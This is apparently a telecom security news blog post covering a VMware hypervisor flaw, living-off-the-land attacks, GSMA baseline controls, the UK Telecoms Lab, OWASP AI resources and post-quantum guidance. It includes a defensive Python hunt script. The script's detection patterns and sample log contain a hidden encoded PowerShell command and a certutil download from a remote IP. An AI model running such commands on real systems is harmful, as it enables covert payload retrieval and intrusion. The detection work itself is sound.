Mobile Telecom Security Landscape Blog: June 24

This blog post discusses virtualisation security, ‘living off the land’ attacks, GSMA’s recent update to its baseline controls, an approach to security testing, the OWASP AI Exchange and post-quantum telco network activity.

VMware ESXi, Workstation and Fusion contain a vulnerability[1] in their XHCI USB controller emulation. VMware rates the issue Critical for Workstation and Fusion, with a maximum CVSSv3 base score of 9.3, and Important for ESXi, with a maximum CVSSv3 base score of 8.4. A security fix is available and prompt patching is advised. The issue matters because a virtual device emulated by the hypervisor is exposed to code running inside the guest, so a flaw in it is a path by which a compromised VM could reach the host. ESXi is a bare-metal hypervisor (i.e. it sits directly on the hardware, beneath the guest operating systems) with direct access to and control of the underlying resources, so anything that reaches it can affect every VM on that host. A hypervisor is virtualisation software that creates and manages virtual machines (VMs) by separating a computer’s software from its hardware.

The US Cybersecurity & Infrastructure Security Agency (CISA) and the National Security Agency (NSA) recently released five joint Cybersecurity Information Sheets (CSIs) that give organisations best practices and mitigations for improving their cloud security.

A report[2] earlier this year highlighted that state-sponsored cyber actors are seeking to pre-position themselves on telecom networks for later disruptive or destructive cyberattacks. It documented how intruders were inside the systems of Ukrainian telecoms giant Kyivstar from at least May last year; the attack that followed on 12 December disabled services for some 24 million users for several days.

A type of tradecraft known as ‘living off the land’ (LOTL) abuses the native tools and processes already present on systems and lets attackers operate discreetly. The activity blends in with legitimate system and network behaviour, and the lack of conventional indicators of compromise (IOCs) makes it hard for operators to detect, allowing long-term undiscovered persistence. Part of the challenge is finding a relatively small volume of malicious activity within large volumes of log data. This persistent access can be used for data extraction, traffic monitoring and, later, destructive attacks that disable services.

A joint guide[3] for network defenders focuses on mitigating the identified gaps and on how defensive ‘blue’ teams can proactively detect and hunt for LOTL activity through behavioural analytics, anomaly detection and proactive hunting. It also recommends hardening systems, tuning endpoint detection, network segmentation, operating least privilege, and establishing and maintaining baselines of network, user, administrative and application activity, since a deviation from a known-good baseline is often the only signal that LOTL tradecraft leaves.
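One way to turn the guide’s baseline-and-anomaly advice into a concrete hunt, as an added example that is not code from the guide or from this post: build a baseline of which native binaries each host, user and parent process normally runs, then flag only the LOLBin executions that fall outside it or carry arguments that are rarely legitimate. The record format, host and user names (msc01, hss02, svc_backup and so on), LOLBin list and argument patterns below are all constructed for illustration; a real deployment would ingest EDR or Sysmon process-creation events and build the baseline over weeks of known-good data.

```python
"""
Baseline-then-deviate hunt for living-off-the-land (LOTL) activity.

Added example, not code from the joint guide or the original post. The
record format, host/user names, LOLBin list and argument patterns are
constructed for illustration; a real deployment would ingest EDR or Sysmon
process-creation events and build the baseline over weeks of known-good data.
"""
from collections import defaultdict
import re

# Native Windows binaries frequently abused in LOTL tradecraft (illustrative subset).
LOLBINS = {"powershell.exe", "certutil.exe", "wmic.exe", "rundll32.exe",
           "mshta.exe", "bitsadmin.exe", "regsvr32.exe", "schtasks.exe"}

# Argument patterns that are rarely legitimate at scale, flagged regardless of baseline.
SUSPICIOUS_ARGS = [
    ("powershell encoded command", re.compile(r"-enc(odedcommand)?\s", re.I)),
    ("certutil download", re.compile(r"-urlcache\b.*\s-f\b", re.I)),
    ("wmic remote process creation", re.compile(r"\bprocess\s+call\s+create\b", re.I)),
    ("script URI via mshta/rundll32", re.compile(r"javascript:|vbscript:", re.I)),
]

# Constructed process-creation record layout: host, user, parent image, image, command line.
RECORD_RE = re.compile(
    r'host=(?P<host>\S+) user=(?P<user>\S+) parent=(?P<parent>\S+) '
    r'image=(?P<image>\S+) cmd="(?P<cmd>.*)"$'
)


def parse(line):
    m = RECORD_RE.match(line.strip())
    if not m:
        raise ValueError(f"unparseable record: {line!r}")
    rec = m.groupdict()
    rec["parent"] = rec["parent"].lower()
    rec["image"] = rec["image"].lower()
    return rec


def records(text):
    return [parse(l) for l in text.splitlines() if l.strip()]


def build_baseline(lines):
    """Count (host, user, parent, image) tuples over a known-good window.
    Anything seen here is treated as normal for that host; the hunt only
    raises what is absent from this map, which is what keeps the small
    volume of malicious activity visible inside the large volume of logs."""
    baseline = defaultdict(int)
    for rec in records(lines):
        baseline[(rec["host"], rec["user"], rec["parent"], rec["image"])] += 1
    return baseline


def hunt(baseline, lines):
    """Return (reason, record) findings for LOLBin executions that either
    deviate from the baseline or carry suspicious arguments."""
    findings = []
    for rec in records(lines):
        if rec["image"] not in LOLBINS:
            continue  # only native tools are of interest for LOTL
        key = (rec["host"], rec["user"], rec["parent"], rec["image"])
        if key not in baseline:
            findings.append(("LOLBin in unseen host/user/parent combination", rec))
        for label, pat in SUSPICIOUS_ARGS:
            if pat.search(rec["cmd"]):
                findings.append((label, rec))
                break
    return findings


# Constructed known-good window (the guide's "baseline of activity").
BASELINE_LOG = r'''
host=msc01 user=svc_backup parent=backup_agent.exe image=powershell.exe cmd="powershell.exe -File C:\ops\rotate.ps1"
host=msc01 user=svc_backup parent=backup_agent.exe image=powershell.exe cmd="powershell.exe -File C:\ops\rotate.ps1"
host=msc01 user=admin parent=cmd.exe image=schtasks.exe cmd="schtasks.exe /query"
host=hss02 user=svc_mon parent=monitor.exe image=wmic.exe cmd="wmic.exe os get caption"
'''

# Constructed hunt window: the same routine activity plus two LOTL-style events.
HUNT_LOG = r'''
host=msc01 user=svc_backup parent=backup_agent.exe image=powershell.exe cmd="powershell.exe -File C:\ops\rotate.ps1"
host=msc01 user=svc_backup parent=w3wp.exe image=powershell.exe cmd="powershell.exe -nop -w hidden -enc SQBFAFgA"
host=hss02 user=svc_mon parent=monitor.exe image=certutil.exe cmd="certutil.exe -urlcache -split -f http://203.0.113.7/a.txt a.txt"
host=hss02 user=svc_mon parent=monitor.exe image=wmic.exe cmd="wmic.exe os get caption"
host=msc01 user=admin parent=explorer.exe image=notepad.exe cmd="notepad.exe"
'''


def run_example():
    return hunt(build_baseline(BASELINE_LOG), HUNT_LOG)


if __name__ == "__main__":
    for reason, rec in run_example():
        print(f"{rec['host']} {rec['user']} {rec['parent']} -> {rec['image']}: {reason}")
```

Run against the constructed windows, the routine backup and monitoring executions produce nothing, while the PowerShell spawned by a web worker process and the certutil download on the HSS host are each raised twice: once for falling outside the baseline and once for their arguments. The two checks are deliberately independent, because a baseline that is built while an intruder is already present will contain their activity, and the argument patterns are the only signal left in that case.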

GSMA’s Baseline Controls guidelines, FS.31[4], have received a significant update. FS.31 sets out a recommended set of security controls that network operators should consider deploying, mapped to the threats described in FS.30 (a GSMA member-only document), with references to relevant standards and other best-practice resources. The solution description for each control gives specific advice on how an operator can meet the control objective. The update adds controls for edge computing, network function virtualisation, network slicing and network orchestration: 85 new controls in total, with enhanced guidance for 29 existing solutions.

The UK Telecoms Lab (UKTL) is a telecoms security laboratory established by the UK Government’s Department for Science, Innovation and Technology (DSIT) and operated by the National Physical Laboratory (NPL). It is a national facility, located in Solihull, that aims to provide test and evaluation capability to build confidence in the resilience and security of telecoms systems deployed in the UK. The UKTL was set up to support the UK government’s telecoms security policy and its supply chain diversification ambitions. Some form of international cooperation is anticipated.

The OWASP AI Exchange[5] is an open, collaborative project on the security of AI that aims to advance the development of AI security standards and regulations by providing an overview of AI threats, vulnerabilities and controls. Related OWASP resources are the LLM AI Cybersecurity & Governance Checklist[6] and the OWASP Top 10 for LLM Applications[7], a list of the most critical vulnerabilities found in applications that use large language models (LLMs).

GSMA’s Post Quantum Telco Networks group has released its latest whitepaper, PQ.03 Post Quantum Cryptography – Guidelines for Telecom Use Cases[8]. The document provides a set of best-practice guidelines to support the telecom ecosystem’s journey to quantum-safe cryptography. It builds directly on the group’s first impact assessment whitepaper[9] and takes into account the risk assessment frameworks being adopted by the wider industry and the implementation roadmap for post-quantum cryptography.

If you’d like to discuss or to get more closely involved, please email [email protected].